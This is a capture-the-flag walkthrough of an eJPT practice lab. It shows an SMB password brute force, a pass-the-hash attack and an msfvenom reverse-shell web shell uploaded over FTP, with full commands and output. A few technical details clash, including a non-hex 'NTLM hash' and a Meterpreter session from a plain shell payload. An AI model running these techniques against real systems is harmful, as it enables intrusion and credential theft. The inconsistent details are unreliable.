Host & Network Penetration Testing: Exploitation CTF 2 Walkthrough
This walkthrough covers a comprehensive penetration testing exercise demonstrating various exploitation techniques commonly encountered in real-world scenarios and eJPT certification preparation. We’ll explore SMB enumeration, password attacks, hash-based authentication, and web shell deployment in a systematic approach.
Overview
Target: target.ine.local (10.2.27.100)
Attacker: 10.10.49.6
Objectives: Exploit vulnerable services and retrieve 4 flags
Key Skills: SMB exploitation, password attacks, FTP enumeration, web shell deployment
Initial Reconnaissance
We’ll start with comprehensive reconnaissance to understand our target’s attack surface and identify potential entry points.
Step 1: Target Identification
First, let’s identify our target from the hosts file to confirm we’re attacking the correct system:
1
cat /etc/hosts
Hosts File Content:
1
2
3
4
5
6
7
8
9
10
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.1.0.12 INE
127.0.0.1 AttackDefense-Kali
10.10.49.6 INE
10.2.27.100 target.ine.local
This reveals our target at 10.2.27.100 with hostname target.ine.local. Having the hostname is useful as some services may behave differently when accessed via hostname versus IP address.
Step 2: Port Scanning and Service Discovery
Starting with our standard nmap reconnaissance to identify open ports and services. This comprehensive scan helps us understand what services are running and their versions, which is crucial for vulnerability assessment:
1
nmap -sV -sC -p- 10.2.27.100 -oX scanResult.txt
Nmap Results:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-28 17:30 IST
Nmap scan report for target.ine.local (10.2.27.100)
Host is up (0.0031s latency).
Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2025-09-28T12:01:38+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=WIN-M878Q9NE9S6
| Not valid before: 2025-09-27T11:53:49
|_Not valid after: 2026-03-29T11:53:49
| rdp-ntlm-info:
| Target_Name: WIN-M878Q9NE9S6
| NetBIOS_Domain_Name: WIN-M878Q9NE9S6
| NetBIOS_Computer_Name: WIN-M878Q9NE9S6
| DNS_Domain_Name: WIN-M878Q9NE9S6
| DNS_Computer_Name: WIN-M878Q9NE9S6
| Product_Version: 6.3.9600
|_ System_Time: 2025-09-28T12:01:30+00:00
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
49210/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-09-28T12:01:31
|_ start_date: 2025-09-28T11:53:47
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled but not required
Key Findings:
- Port 21: Microsoft FTP Server (Windows_NT)
- Port 80: Microsoft IIS httpd 8.5
- Port 135: Microsoft Windows RPC
- Port 139: NetBIOS Session Service
- Port 445: Microsoft SMB
- Port 3389: SSL/RDP (Certificate: WIN-M878Q9NE9S6)
- Multiple high ports: Various Microsoft RPC services
The scan reveals a Windows Server environment running IIS 8.5, which suggests Windows Server 2012 R2. The presence of SMB, FTP, and RDP services provides multiple potential attack vectors.
Step 3: Operating System Fingerprinting
Let’s attempt more detailed OS detection to better understand our target:
1
nmap -sV -O 10.2.27.100 -oX scanResultOS.txt
OS Detection Results:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-28 17:33 IST
Nmap scan report for target.ine.local (10.2.27.100)
Host is up (0.0025s latency).
Not shown: 990 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft IIS httpd 8.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ssl/ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
While no exact OS match was found, the service versions and behavior patterns confirm this is a Windows Server system, likely Server 2012 R2 based on the IIS 8.5 version.
Step 4: FTP Anonymous Access Testing
Since FTP is running, let’s check if anonymous access is permitted. This is a common misconfiguration that can provide easy initial access:
1
nmap -sV -p 21 --script=ftp-anon 10.2.27.100
FTP Anonymous Test Results:
1
2
3
4
5
6
7
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-28 17:38 IST
Nmap scan report for target.ine.local (10.2.27.100)
Host is up (0.0027s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Let’s try manual anonymous access:
1
ftp 10.2.27.100 21
FTP Login Results:
1
2
3
4
5
6
7
8
9
Connected to 10.2.27.100.
220 Microsoft FTP Service
Name (10.2.27.100:root): Anonymous
331 Password required
Password:
530 User cannot log in.
ftp: Login failed
ftp> exit
221 Goodbye.
Anonymous FTP access is properly disabled, so we’ll need valid credentials to access this service.
Challenge 1: SMB User Enumeration and Password Attack
Objective
“Looks like smb user tom has not changed his password from a very long time.”
The challenge hint suggests user “tom” has a weak password. Since SMB is running on port 445, this becomes our primary attack vector.
Step 1: SMB Brute Force Attack Setup
We’ll use Metasploit’s SMB login scanner for an efficient dictionary attack. This module is particularly effective because it can handle Windows authentication properly and create sessions for further exploitation:
1
2
3
msfconsole
search smb_login
use auxiliary/scanner/smb/smb_login
Metasploit Search Results:
1
2
3
4
5
6
7
8
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/smb/smb_login . normal No SMB Login Check Scanner
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smb/smb_login
Step 2: Module Configuration
Let’s configure the scanner with appropriate parameters. The unix_passwords.txt wordlist is effective against weak passwords that haven’t been changed in a long time:
1
2
3
4
5
6
show options
set RHOSTS 10.2.27.100
set SMBUser tom
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
set CreateSession true
run
Module Options:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
Module options (auxiliary/scanner/smb/smb_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is detected
ANONYMOUS_LOGIN false yes Attempt to login with a blank username and password
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
CreateSession false no Create a new session for every successful login
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
RHOSTS yes The target host(s)
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
Brute Force Attack Results:
1
2
3
4
5
6
7
8
9
10
11
12
[-] 10.2.27.100:445 - 10.2.27.100:445 - Failed: '.\tom:michelle1'
[-] 10.2.27.100:445 - 10.2.27.100:445 - Failed: '.\tom:maddie'
[-] 10.2.27.100:445 - 10.2.27.100:445 - Failed: '.\tom:angie'
[-] 10.2.27.100:445 - 10.2.27.100:445 - Failed: '.\tom:cinderella'
[-] 10.2.27.100:445 - 10.2.27.100:445 - Failed: '.\tom:jesuschrist'
[-] 10.2.27.100:445 - 10.2.27.100:445 - Failed: '.\tom:lester'
[... many failed attempts ...]
[-] 10.2.27.100:445 - 10.2.27.100:445 - Failed: '.\tom:happy1'
[+] 10.2.27.100:445 - 10.2.27.100:445 - Success: '.\tom:felipe'
[*] 10.2.27.100:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.2.27.100:445 - Bruteforce completed, 1 credential was successful.
[*] 10.2.27.100:445 - You can open an SMB session with these credentials and CreateSession set to true
Success! The scanner discovers that user tom has password felipe. This confirms the weak password assumption from the challenge hint.
Step 3: SMB Share Enumeration
Now that we have valid credentials, let’s enumerate the available SMB shares to understand what data we can access:
1
smbclient -L 10.2.27.100 -U tom
SMB Share Enumeration Results:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
Password for [WORKGROUP\tom]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
D$ Disk Default share
HRDocuments Disk
IPC$ IPC Remote IPC
ITResources Disk
print$ Disk Printer Drivers
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.2.27.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Available Shares:
- ADMIN$ (Remote Admin) - Administrative share
- C$ (Default share) - C drive access
- D$ (Default share) - D drive access
- HRDocuments - Custom department share
- IPC$ (Remote IPC) - Inter-process communication
- ITResources - Custom IT department share
- print$ (Printer Drivers) - Print services
The custom shares HRDocuments and ITResources are particularly interesting as they likely contain sensitive organizational data.
Step 4: Accessing HRDocuments Share
Let’s use our Metasploit SMB session to access the shares systematically:
1
2
3
4
sessions -i 1
shares
shares -i 3 # Connect to HRDocuments
ls
Session Management:
1
2
3
4
5
6
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 smb SMB tom @ 10.2.27.100:445 10.10.49.6:45959 -> 10.2.27.100:445 (10.2.27.100)
Share Access Results:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
SMB (10.2.27.100) > shares
Shares
======
# Name Type comment
- ---- ---- -------
0 ADMIN$ DISK|SPECIAL Remote Admin
1 C$ DISK|SPECIAL Default share
2 D$ DISK|SPECIAL Default share
3 HRDocuments DISK
4 IPC$ IPC|SPECIAL Remote IPC
5 ITResources DISK
6 print$ DISK Printer Drivers
SMB (10.2.27.100) > shares -i 3
[+] Successfully connected to HRDocuments
SMB (10.2.27.100\HRDocuments) > ls
ls
===
# Type Name Created Accessed Written Changed Size
- ---- ---- ------- -------- ------- ------- ----
0 DIR . 2024-06-13T14:10:49 2024-06-14T11:36:28+ 2025-09-28T17:2 2025-09-28T17:2
+05:30 05:30 3:52+05:30 3:52+05:30
1 DIR .. 2024-06-13T14:10:49 2024-06-14T11:36:28+ 2025-09-28T17:2 2025-09-28T17:2
+05:30 05:30 3:52+05:30 3:52+05:30
2 FILE flag1.txt 2025-09-28T17:23:52 2025-09-28T17:23:52+ 2025-09-28T17:2 2025-09-28T17:2 34
+05:30 05:30 3:52+05:30 3:52+05:30
3 FILE leaked-hashes.txt 2024-06-13T14:32:47 2024-06-14T11:35:14+ 2024-06-14T11:3 2024-06-14T11:3 6665
+05:30 05:30 5:55+05:30 5:55+05:30
Files Discovered:
flag1.txt- Our target flagleaked-hashes.txt- Potentially containing credential hashes
This is exactly what we need! The leaked hashes file suggests there may be additional users we can compromise.
Step 5: File Retrieval
1
2
download flag1.txt
download leaked-hashes.txt
File Download Results:
1
2
3
4
5
6
SMB (10.2.27.100\HRDocuments) > download flag1.txt
[*] Downloaded 34.00 B of 34.00 B (100.0%)
[+] Downloaded flag1.txt to flag1.txt
SMB (10.2.27.100\HRDocuments) > download leaked-hashes.txt
[*] Downloaded 6.51 KiB of 6.51 KiB (100.0%)
[+] Downloaded leaked-hashes.txt to leaked-hashes.txt
Reading the flag file:
1
cat flag1.txt
Flag 1 Content:
1
7709e0d8e268405599af1eb0ea8bf304
🚩 Flag 1: 7709e0d8e268405599af1eb0ea8bf304
Challenge 2: NTLM Hash Attack
Objective
“Using the NTLM hash list discovered in the previous challenge, can you compromise the smb user nancy?”
The leaked hashes file provides us with NTLM hashes that we can use for pass-the-hash attacks, a powerful technique in Windows environments.
Step 1: Hash Analysis
Let’s examine the contents of the leaked hashes file:
1
cat leaked-hashes.txt
Leaked Hashes Content:
1
2
3
4
5
6
7
8
9
10
11
12
aad3b435b51404eeaad3b435b51404ee:a3dwea4b4v957f2e037rf75cfe5218ed
aad3b435b51404eeaad3b435b51404ee:33f0bc3a5ea6ea0a0eb8d81e8a3c18e0
aad3b435b51404eeaad3b435b51404ee:2b6fb4dca01db3065f8ef2a654aeaf14
aad3b435b51404eeaad3b435b51404ee:8f06e3a0fda656e3f7c5b35b7e332e98
aad3b435b51404eeaad3b435b51404ee:b5ae529619b206bf3e4b45e8a22c40da
aad3b435b51404eeaad3b435b51404ee:46c197f775b07056337e85f8378244f5
aad3b435b51404eeaad3b435b51404ee:24c3d6a1da5d70f88a3f91faad0e6a75
[... many more hashes ...]
aad3b435b51404eeaad3b435b51404ee:b3ddea4b4b957f3e037af75cfe5317ad
aad3b435b51404eeaad3b435b51404ee:3e7a00edf97e91a9bbd85e6ef9bdfb8e
aad3b435b51404eeaad3b435b51404ee:7e7fcf33d3aa541fe76b05e47f6873d8
[... continues for 80+ hashes ...]
The file contains NTLM hashes in the format:
1
aad3b435b51404eeaad3b435b51404ee:actual_ntlm_hash
The first part (aad3b435b51404eeaad3b435b51404ee) is the LM hash placeholder, while the second part contains the actual NTLM hash. In modern Windows systems, LM hashes are typically empty and replaced with this placeholder.
Step 2: Hash Extraction
For easier processing, let’s extract just the NTLM portions:
1
cut -d':' -f2 leaked-hashes.txt > ntlm-hashes.txt
However, for pass-the-hash attacks, we need the full format, so we’ll use the original file directly.
Step 3: Pass-the-Hash Attack
Pass-the-hash attacks allow us to authenticate using the hash directly without knowing the plaintext password. This is possible because Windows NTLM authentication can work with just the hash:
1
2
3
4
5
6
use auxiliary/scanner/smb/smb_login
set SMBUser nancy
set PASS_FILE leaked-hashes.txt
set RHOSTS 10.2.27.100
set CreateSession true
run
Pass-the-Hash Attack Results:
1
2
3
4
5
6
7
8
9
10
[*] 10.2.27.100:445 - 10.2.27.100:445 - Starting SMB login bruteforce
[-] 10.2.27.100:445 - 10.2.27.100:445 - Failed: '.\nancy:aad3b435b51404eeaad3b435b51404ee:a3dwea4b4v957f2e037rf75cfe5218ed'
[-] 10.2.27.100:445 - 10.2.27.100:445 - Failed: '.\nancy:aad3b435b51404eeaad3b435b51404ee:33f0bc3a5ea6ea0a0eb8d81e8a3c18e0'
[... several failed attempts ...]
[-] 10.2.27.100:445 - 10.2.27.100:445 - Failed: '.\nancy:aad3b435b51404eeaad3b435b51404ee:34ec1e4f6f7cbe35a09ee51b1c0039d2'
[+] 10.2.27.100:445 - 10.2.27.100:445 - Success: '.\nancy:aad3b435b51404eeaad3b435b51404ee:b3ddea4b4b957f3e037af75cfe5317ad'
[*] SMB session 3 opened (10.10.49.6:43419 -> 10.2.27.100:445) at 2025-09-28 19:34:03 +0530
[*] 10.2.27.100:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.2.27.100:445 - Bruteforce completed, 1 credential was successful.
[*] 10.2.27.100:445 - 1 SMB session was opened successfully.
Success! User nancy authenticates with hash: b3ddea4b4b957f3e037af75cfe5317ad
This demonstrates how leaked password hashes can be directly exploited without needing to crack them first.
Step 4: Accessing ITResources Share
With nancy’s access, let’s explore what additional resources we can access:
1
2
3
4
sessions -i 3
shares
shares -i 5 # Connect to ITResources
ls
ITResources Share Access:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
SMB (10.2.27.100) > shares
Shares
======
# Name Type comment
- ---- ---- -------
0 ADMIN$ DISK|SPECIAL Remote Admin
1 C$ DISK|SPECIAL Default share
2 D$ DISK|SPECIAL Default share
3 HRDocuments DISK
4 IPC$ IPC|SPECIAL Remote IPC
5 ITResources DISK
6 print$ DISK Printer Drivers
SMB (10.2.27.100) > shares -i 5
[+] Successfully connected to ITResources
SMB (10.2.27.100\ITResources) > ls
ls
===
# Type Name Created Accessed Written Changed Size
- ---- ---- ------- -------- ------- ------- ----
0 DIR . 2024-06-13T14:11:07+05:30 2025-09-28T18:51:37+05:30 2025-09-28T18:51:37+05:30 2025-09-28T18:51:37+05:30
1 DIR .. 2024-06-13T14:11:07+05:30 2025-09-28T18:51:37+05:30 2025-09-28T18:51:37+05:30 2025-09-28T18:51:37+05:30
2 FILE flag2.txt 2025-09-28T18:51:37+05:30 2025-09-28T18:51:37+05:30 2025-09-28T18:51:37+05:30 2025-09-28T18:51:37+05:30 34
3 FILE hint.txt 2024-06-13T14:45:39+05:30 2024-06-13T14:45:39+05:30 2024-06-13T16:00:47+05:30 2024-06-13T16:00:47+05:30 71
Files Found:
flag2.txt- Our second target flaghint.txt- Likely contains useful information for next steps
Step 5: File Retrieval and Analysis
1
2
download flag2.txt
download hint.txt
File Download Results:
1
2
3
4
5
6
SMB (10.2.27.100\ITResources) > download flag2.txt
[*] Downloaded 34.00 B of 34.00 B (100.0%)
[+] Downloaded flag2.txt to flag2.txt
SMB (10.2.27.100\ITResources) > download hint.txt
[*] Downloaded 71.00 B of 71.00 B (100.0%)
[+] Downloaded hint.txt to hint.txt
1
cat flag2.txt
Flag 2 Content:
1
1dd400033942437c983d4ca85c044828
🚩 Flag 2: 1dd400033942437c983d4ca85c044828
1
cat hint.txt
Hint File Content:
1
Who knows, these creds might come handy! ---> david:omnitrix_9901
This provides us with credentials for user david, which will be useful for our next challenge.
Challenge 3: FTP Service Exploitation
Objective
“I wonder what the hint found in the previous challenge be useful for!”
The hint file provided credentials for user david. Since we discovered FTP running on port 21 during our initial reconnaissance, let’s try these credentials there.
Step 1: FTP Authentication
Using the credentials discovered in the hint file:
1
2
3
ftp target.ine.local
# Username: david
# Password: omnitrix_9901
FTP Authentication Results:
1
2
3
4
5
6
7
8
Connected to target.ine.local.
220 Microsoft FTP Service
Name (target.ine.local:root): david
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>
Success! FTP access granted. This shows how information gathered from one service can be leveraged to access other services.
Step 2: FTP Directory Enumeration
Now let’s explore what’s available in the FTP directory:
1
ftp> ls
FTP Directory Listing:
1
2
3
4
5
6
7
8
ftp> ls
229 Entering Extended Passive Mode (|||49460|)
125 Data connection already open; Transfer starting.
06-13-24 10:36AM <DIR> aspnet_client
09-28-25 01:21PM 34 flag3.txt
06-13-24 10:34AM 99710 iis-85.png
06-13-24 10:34AM 701 iisstart.htm
226 Transfer complete.
Directory Contents:
- aspnet_client (directory) - ASP.NET client files
flag3.txt- Our target flag- iis-85.png - IIS logo image
- iisstart.htm - Default IIS start page
This directory structure is very telling - it appears we have FTP access to the web root directory of the IIS server. The presence of iisstart.htm and aspnet_client directory confirms this is the web server’s document root.
Step 3: Flag Retrieval
1
ftp> get flag3.txt
Flag 3 Retrieval:
1
2
3
4
5
6
7
ftp> get flag3.txt
local: flag3.txt remote: flag3.txt
229 Entering Extended Passive Mode (|||49463|)
150 Opening ASCII mode data connection.
100% |******************************************************************| 34 13.13 KiB/s 00:00 ETA
226 Transfer complete.
34 bytes received in 00:00 (11.92 KiB/s)
1
cat flag3.txt
Flag 3 Content:
1
dd04520d2c574e98ac278f232b340783
🚩 Flag 3: dd04520d2c574e98ac278f232b340783
Step 4: Strategic Analysis
Having FTP write access to the web root directory is a significant security vulnerability. This means we can upload files that will be accessible via the web server, potentially including malicious code that could give us remote code execution.
Challenge 4: Web Shell Upload and System Compromise
Objective
“Can you compromise the target machine and retrieve the C://flag4.txt file?”
With FTP write access to the web root and IIS running ASP.NET, we can upload a web shell to achieve remote code execution.
Step 1: Payload Generation
Since this is an IIS server supporting ASP.NET, we’ll create an ASP reverse shell using msfvenom:
1
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.49.6 LPORT=1234 -f asp > shell.aspx
Payload Generation Results:
1
2
3
4
5
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of asp file: 38244 bytes
This creates a reverse shell payload in ASP format that will connect back to our machine when executed by the web server.
Step 2: Payload Upload via FTP
Upload our malicious payload to the web root:
1
ftp> put shell.aspx
Payload Upload Results:
1
2
3
4
5
6
7
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
229 Entering Extended Passive Mode (|||49489|)
125 Data connection already open; Transfer starting.
100% |******************************************************************| 38244 8.21 MiB/s --:-- ETA
226 Transfer complete.
38244 bytes sent in 00:00 (5.50 MiB/s)
The file is now accessible via the web server at http://target.ine.local/shell.aspx.
Step 3: Reverse Shell Handler Setup
Before triggering our payload, we need to set up a handler to catch the incoming connection:
1
2
3
4
5
use multi/handler
set payload windows/shell/reverse_tcp
set LHOST 10.10.49.6
set LPORT 1234
run
Handler Setup Results:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
msf6 exploit(multi/handler) > show options
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
msf6 exploit(multi/handler) > set lhost 10.10.49.6
lhost => 10.10.49.6
msf6 exploit(multi/handler) > set lport 1234
lport => 1234
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.49.6:1234
Step 4: Payload Execution
Navigate to our uploaded shell in a web browser:
1
http://target.ine.local/shell.aspx
Reverse Shell Connection Results:
1
2
3
4
5
[*] Started reverse TCP handler on 10.10.49.6:1234
[*] Sending stage (201798 bytes) to 10.2.27.100
[*] Meterpreter session 6 opened (10.10.49.6:1234 -> 10.2.27.100:49576) at 2025-09-28 20:02:25 +0530
meterpreter >
Success! Our reverse shell connects, providing us with command execution on the target system.
Step 5: System Access and Flag Retrieval
Now we have a command shell on the target system. Let’s navigate to retrieve our final flag:
1
2
3
4
5
6
meterpreter > shell
Process 1692 created.
Channel 1 created.
c:\windows\system32\inetsrv> cd c:\
c:\> dir
c:\> type flag4.txt
System Access and Flag Retrieval:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
meterpreter > shell
Process 1692 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>cd c:\
cd c:\
c:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is AEDF-99BD
Directory of c:\
09/28/2025 01:21 PM 34 flag4.txt
06/13/2024 10:35 AM <DIR> inetpub
08/22/2013 03:52 PM <DIR> PerfLogs
08/12/2020 04:13 AM <DIR> Program Files
11/15/2022 06:51 AM <DIR> Program Files (x86)
06/13/2024 08:41 AM <DIR> Shares
01/09/2025 05:36 AM <DIR> Users
01/09/2025 05:30 AM <DIR> Windows
1 File(s) 34 bytes
7 Dir(s) 239,054,848 bytes free
c:\>type flag4.txt
type flag4.txt
972d3f3b01e8468bb9ea81ce98d34c75
Flag 4 Content:
1
972d3f3b01e8468bb9ea81ce98d34c75
🚩 Flag 4: 972d3f3b01e8468bb9ea81ce98d34c75
Attack Chain Summary
This exercise demonstrated a realistic attack progression where each compromise enables the next:
- Initial Reconnaissance - Port scanning identified SMB, FTP, and HTTP services
- SMB Password Attack - Brute forced weak password for user ‘tom’
- Information Gathering - Found NTLM hashes in accessible share
- Lateral Movement - Pass-the-hash attack compromised user ‘nancy’
- Credential Discovery - Discovered FTP credentials for user ‘david’
- Service Exploitation - FTP access to web root enabled file upload
- Code Execution - Uploaded web shell for remote command execution
- System Compromise - Achieved full system access for final flag
Key Techniques Used
SMB Exploitation - Used Metasploit’s automated scanner for efficient password brute forcing and pass-the-hash attacks against Windows authentication.
Credential Reuse - Leveraged information from one compromised service to access others, demonstrating how attackers move laterally through systems.
Web Shell Deployment - Combined FTP write access with web server execution to achieve remote code execution through ASP payload upload.
Vulnerabilities Exploited
Weak Passwords - User ‘tom’ had a dictionary-based password vulnerable to brute force attacks.
Credential Storage - Leaked NTLM hashes enabled direct authentication without password cracking.
Service Integration - FTP access to web root created a path from file upload to code execution.
Access Controls - Users had excessive permissions to sensitive network shares.
Security Lessons
Defense Strategies:
- Implement strong password policies and multi-factor authentication
- Use proper credential storage with salted hashes
- Isolate services and apply least privilege principles
- Monitor for failed authentication attempts and unusual file uploads
Key Takeaway: This lab showed how multiple minor weaknesses combine to enable complete compromise. The attack chain from weak passwords to web shell deployment illustrates real-world penetration testing methodology.
Captured Flags:
- Flag 1:
7709e0d8e268405599af1eb0ea8bf304(SMB brute force) - Flag 2:
1dd400033942437c983d4ca85c044828(Pass-the-hash) - Flag 3:
dd04520d2c574e98ac278f232b340783(FTP access) - Flag 4:
972d3f3b01e8468bb9ea81ce98d34c75(Web shell execution)
Conclusion
This CTF exercise demonstrated how multiple seemingly minor security weaknesses can be chained together to achieve complete system compromise. The progression from weak passwords through credential reuse to web shell deployment illustrates real-world attack patterns that penetration testers and defenders need to understand.
Each flag required different exploitation techniques, showcasing the diverse skill set needed for effective penetration testing. The exercise reinforced that security is only as strong as the weakest link - even with some controls in place, the combination of weak passwords, credential leakage, and service misconfigurations created multiple paths to compromise.
For aspiring penetration testers, this lab demonstrates the importance of systematic enumeration, lateral thinking about service relationships, and understanding how different attack techniques can be combined for maximum impact.
This writeup is part of the eJPT certification journey, demonstrating practical penetration testing techniques in a controlled environment.